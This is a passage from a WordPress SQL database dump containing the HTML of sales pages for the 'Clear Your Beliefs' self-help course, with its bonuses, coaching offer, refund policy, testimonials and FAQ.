ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\n<div class="module_body">\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\n</div>\n<div class="module_body">\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You''ll receive the first two chapters of the book as Bonus #4, below.\n\n</div>\n<div class="module_body">\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\n<div class="module_body">\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n<ul style="padding-left: 20px;">\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\n	<li>Learn a process that can strengthen your power of intention</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Change Your Beliefs eBook</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\n</div>\n<div class="module_body">\n\nYou''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>" \n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior. \n\nIt''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n</div>\n<div class="module_body"></div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n</div>\n</div>\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<h1 id="package"></h1>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top"><font color="#2E2EFE">Up To Top</a></font></p>\n&nbsp;\n<div class="icon_box" style="background: #EFF8FB; width: 500px; margin: 17px auto;">\n<h1>Purchase Today and You''ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n	<strong>=> <em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n	<strong>=> <em>The Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\n	<strong>=> <em>Your Childhood Bonding Pattern Assessment:</em></strong> The LoveStyle Profile Quiz\n	<strong>=> <em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\n	<strong>=> <em>Clear Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> Multimedia eBook by Lion Goodman (PDF)\n	<strong>=> <em>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n	<strong>=> <em>Professional Coaching Sessions:</strong> </em> Optional.\n\n<div class="clear"></div>\n&nbsp;\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Register Now</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n\n</div>\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n<div class="icon_box">\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n<div class="quot">\n\n<em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>– G. J., software developer</strong></div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n</div>\n<div class="quot">\n\n<em>"I uncovered beliefs I didn''t know I had, including: "<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God."</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ C.T., Performance and Life Coach</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>– M.M., International Business Consultant</strong></div>\n<div style="text-align: right;"></div>\n</div>\n&nbsp;\n\n</div>\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Register Now</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n\n<div class="parg-text"><p><strong>Q: What is a virtual course?</strong></p></div>\n\n<div class="parg-text"><p>A: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.</p></div>\n\n<div class="parg-text"><p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p></div>\n\n<div class="parg-text"><p><strong>Q: How long will I have access to the course?</strong></p></div>\n\n<div class="parg-text"><p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: Are there scholarships available?</strong></p></div>\n\n<div class="parg-text"><p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">info@clearyourbeliefs.com</a></font>, with a description of your circumstances and your offer of what you can pay.</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your refund policy?</strong></p></div>\n\n<div class="parg-text"><p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: How can I reach Customer Support?</strong></p></div>\n\n<div class="parg-text"><p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. We''ll get back to you within 48 hours (sometimes longer over weekends).</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your Privacy Policy?</strong></p></div>\n\n<div class="parg-text"><p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank" ><FONT COLOR="#2E2EFE">ClearYourBeliefs.com</a></font>, <a href="http://www.BeliefCloset.com" target="_blank" ><FONT COLOR="#2E2EFE">BeliefCloset.com</a></font>, or <a href="http://www.ConfusedAboutLove.com" target="_blank" ><FONT COLOR="#2E2EFE">ConfusedAboutLove.com.</a></font></p></div>\n\n<div class="parg-text"><p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p></div>\n\n<div class="parg-text"><p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p></div>\n\n<script>// <![CDATA[\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\njQuery(function(){jQuery(''a[href*=#]:not([href=#])'').click(function() {if (location.pathname.replace(/^//,'''')+''/'' == this.pathname.replace(/^//,'''') && location.hostname == this.hostname){var target = jQuery(this.hash);target = target.length ? target : jQuery(''[name='' + this.hash.slice(1) +'']'');if (target.length){jQuery(''html,body'').animate({scrollTop: target.offset().top}, 1000);return false;}}});});\n// ]]>\n</script>";s:6:"filter";s:1:"1";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:2:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:2:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1928, 2221, '_wp_attached_file', '2015/07/v-shadow-2.png'),
(1929, 2221, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:730;s:6:"height";i:441;s:4:"file";s:22:"2015/07/v-shadow-2.png";s:5:"sizes";a:6:{s:9:"thumbnail";a:4:{s:4:"file";s:22:"v-shadow-2-150x150.png";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:9:"image/png";}s:6:"medium";a:4:{s:4:"file";s:22:"v-shadow-2-300x181.png";s:5:"width";i:300;s:6:"height";i:181;s:9:"mime-type";s:9:"image/png";}s:14:"category-thumb";a:4:{s:4:"file";s:22:"v-shadow-2-220x220.png";s:5:"width";i:220;s:6:"height";i:220;s:9:"mime-type";s:9:"image/png";}s:15:"product-display";a:4:{s:4:"file";s:22:"v-shadow-2-400x400.png";s:5:"width";i:400;s:6:"height";i:400;s:9:"mime-type";s:9:"image/png";}s:15:"product-preview";a:4:{s:4:"file";s:22:"v-shadow-2-170x200.png";s:5:"width";i:170;s:6:"height";i:200;s:9:"mime-type";s:9:"image/png";}s:14:"post-thumbnail";a:4:{s:4:"file";s:22:"v-shadow-2-672x372.png";s:5:"width";i:672;s:6:"height";i:372;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(1930, 2221, '_edit_lock', '1436339046:2'),
(1933, 1475, '_wp_attachment_image_alt', 'clear your beliefs');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1946, 2227, 'panels_data', 'a:3:{s:7:"widgets";a:1:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:72838:"<center>\n<div class=''embed-container''>\n     <iframe src=''//player.vimeo.com/video/129244809?autoplay=1'' frameborder=''0'' allowfullscreen></iframe>\n</div>\n</center>\n<div class="quot" style="text-align: center; margin: 0px auto ! important;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nLearn to change your beliefs, and your limitations will disappear.\nYour possibilities will then become unlimited.</strong></span>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\n<div class="clear"></div>\n\n&nbsp;\n\n<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>\n\n&nbsp;\n\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.\n\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\n\n<h1><a class="big button blue" href="http://clearyourbeliefs.com/ebook/" target="_blank">Register for FREE Ebook</a></h1>\n\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.\n\n<strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;\n<h1><center><a class="big button blue" href="http://clearyourbeliefs.com/program/#package" >Okay, I''m convinced!<br />Take me to the program description,<br />tell me about all the cool bonuses I''ll get,<br />and how much it costs...</a><br /></center></h1>\n&nbsp;\n<h1>Why Does This Happen?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\n\nNeuroscientists call the brain''s ability to change over time "neuroplasticity."\n\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\n\n&nbsp;\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\n\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\n\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\n\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\n\n&nbsp;\n<h1>Upgrade Your Human Operating System</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\n\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\n<div class="icon_box bullets">\n<ul class="two-col">\n	<li><strong><em>I''m not enough.</em></strong></li>\n	<li><strong><em>I can''t do it.</em></strong></li>\n	<li><strong><em>I''m not worthy.</em></strong></li>\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\n	<li><strong><em>I''m all alone.</em></strong></li>\n</ul>\n<ul class="two-col rt">\n	<li><strong><em>I 